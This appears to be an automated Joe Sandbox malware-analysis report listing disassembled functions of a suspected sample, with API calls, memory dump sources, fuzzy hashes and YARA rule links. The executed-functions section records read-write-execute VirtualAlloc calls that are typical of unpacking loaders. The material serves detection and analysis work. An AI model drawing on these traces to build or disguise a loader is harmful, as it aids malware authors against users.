                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentSizeWorking
                                                                          • String ID: Shrinking process size
                                                                          • API String ID: 2122760700-652428428
                                                                          • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                                          • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                                                          • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                                          • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                                                          Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$Enter$Leave
                                                                          • String ID:
                                                                          • API String ID: 2801635615-0
                                                                          • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                                          • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                                                          • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                                          • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                                                          Function 00007FFAADBEE3F4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                                          • Instruction ID: ed411e3924374de5a95a437566d7d545010640104090dd72561c1c63426aa1a7
                                                                          • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                                          • Instruction Fuzzy Hash: AED1BE36B1AA81C9E711CF65D4402EC37A1FB45798F148236DEAD97B99EF38D40AC380
                                                                          Function 00007FFAADBEED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFAADBEED07), ref: 00007FFAADBEEE38
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFAADBEED07), ref: 00007FFAADBEEEC3
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                                          • Instruction ID: abaf9cd606c74fc3889856815fbd03e5fc7ff0ae70aed0537557759721eb5767
                                                                          • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                                          • Instruction Fuzzy Hash: A791E536E1A651C5F7608F65D4402BD2BA0FB46B88F54C139DEAE67A85EF3CD44AC380
                                                                          Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                                                          • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                                                          • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalEventSection$EnterLeaveReset
                                                                          • String ID:
                                                                          • API String ID: 3553466030-0
                                                                          • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                                          • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                                                          • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                                          • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                                                          Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalEventSection$EnterLeaveReset
                                                                          • String ID:
                                                                          • API String ID: 3553466030-0
                                                                          • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                                          • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                                                          • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                                          • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                                                          Function 00007FFAADBE2218 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                                          • Instruction ID: a2b54a7000d1a707145b3d28b0961f7911c488bf17eff147a13ea9d8222c480d
                                                                          • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                                          • Instruction Fuzzy Hash: 7B111C26B15B01CAEB008B70E8553A833A4F75AB58F440E35DAAD877A4EF78D159C380
                                                                          Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CreateEvent$CriticalInitializeSection
                                                                          • String ID:
                                                                          • API String ID: 926662266-0
                                                                          • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                                          • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                                                          • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                                          • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                                                          Function 00007FFAADBE5448 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 190COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: EncodePointer
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 2118026453-2084237596
                                                                          • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                                          • Instruction ID: 073054705daf8b4dcad6b602d5e85b1407c0cac044983c33bb8648f9a587c130
                                                                          • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                                          • Instruction Fuzzy Hash: 8A919073A09791CAE710CB64D4402AD7BE1FB46788F14813AEB9D17B55EF38D1A9CB80
                                                                          Function 00007FFAADBE51D8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: EncodePointer
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 2118026453-2084237596
                                                                          • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                                          • Instruction ID: f39afa09f12778696b5ee4b5b1c6e42142698d8eed485579f819ab39eead49c3
                                                                          • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                                          • Instruction Fuzzy Hash: 6E619132909BC5C5D720DB15E4407AAB7A0FB86B84F048225EBED07B99EF7CE194CB40
                                                                          Function 00007FFAADBEEA8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          • API String ID: 442123175-4171548499
                                                                          • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                                          • Instruction ID: e31f42fe4f33ed5d4365144ce115e2e420bc31b98411d3071b04bb6fb6a4fac7
                                                                          • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                                          • Instruction Fuzzy Hash: 3041A326B1AB41C1DB20CF25E4443AA67A1FB99794F448135EE9E87798EF3CD445CB80
                                                                          Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionRaise
                                                                          • String ID: csm
                                                                          • API String ID: 3997070919-1018135373
                                                                          • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                                          • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                                                          • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                                          • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                                                          Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: TimerWaitable
                                                                          • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                                          • API String ID: 1823812067-484248852
                                                                          • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                                          • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                                                          • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                                          • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                                                          Function 00007FFAADBE3990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFAADBE112F), ref: 00007FFAADBE39E0
                                                                          • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFAADBE112F), ref: 00007FFAADBE3A21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                                          • Instruction ID: 80667eb65430aaefa68559a208cc7976217a5a1a0e17a06a13c6eb52aa3e27b1
                                                                          • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                                          • Instruction Fuzzy Hash: 79115B36609B8182EB208B25E400269B7E4FB89B84F5C8230DEDD47B98EF3CD555CB40
                                                                          Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: TimerWaitable
                                                                          • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                                          • API String ID: 1823812067-3336177065
                                                                          • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                                          • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                                                          • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                                          • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                                                          Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$FreeProcess
                                                                          • String ID:
                                                                          • API String ID: 3859560861-0
                                                                          • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                                          • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                                                          • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                                          • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

                                                                          Executed Functions

                                                                          Function 053F017F Relevance: 2.8, APIs: 2, Instructions: 267memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 053F01DF
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000003.37242518060.00000000053F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_3_53f0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                          • Instruction ID: 2af07189112e2c46f8b9bb8cac1f633eabd4c4d0459c3bcdfd4cbc30053626ab
                                                                          • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                          • Instruction Fuzzy Hash: 52A14A74A00606EFDB18CFADC884AAEB7B5FF48304B148169E616DB752D770EA51CF90
                                                                          Function 053F044B Relevance: 2.6, APIs: 2, Instructions: 75memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 053F048B
                                                                          • VirtualFree.KERNELBASE(?,?,00004000), ref: 053F04F1
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000003.37242518060.00000000053F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_3_53f0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 2087232378-0
                                                                          • Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                                          • Instruction ID: a93eb6a29f8e4d8c4e2297ce20db543e67e36ba11316330388f37f2671b508d5
                                                                          • Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                                          • Instruction Fuzzy Hash: 1621E175604305BBD7249F9C8C88FBFB7F9EF04214F118468EB5BE2682D67195119B60
                                                                          Function 02D9044B Relevance: 2.6, APIs: 2, Instructions: 75memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02D9048B
                                                                          • VirtualFree.KERNELBASE(?,?,00004000), ref: 02D904F1
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000003.37248288418.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_3_2d90000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 2087232378-0
                                                                          • Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                                          • Instruction ID: 0e55108aac11978e731f720e96caf02c2f14ce8b6db2e0d975bc36b34c886db5
                                                                          • Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                                          • Instruction Fuzzy Hash: BF21C975A00205ABDF209AA49C84FAFB7F9EF05315F108568FA5AE2381D771AD10D6A0
                                                                          Function 02D9017F Relevance: 1.5, APIs: 1, Instructions: 267memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02D901DF
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000003.37248288418.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_3_2d90000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                          • Instruction ID: ce4d0abda0c0c3a4b8eb434e13c2275af1681daf7c34d357ceb1c57a783fe961
                                                                          • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
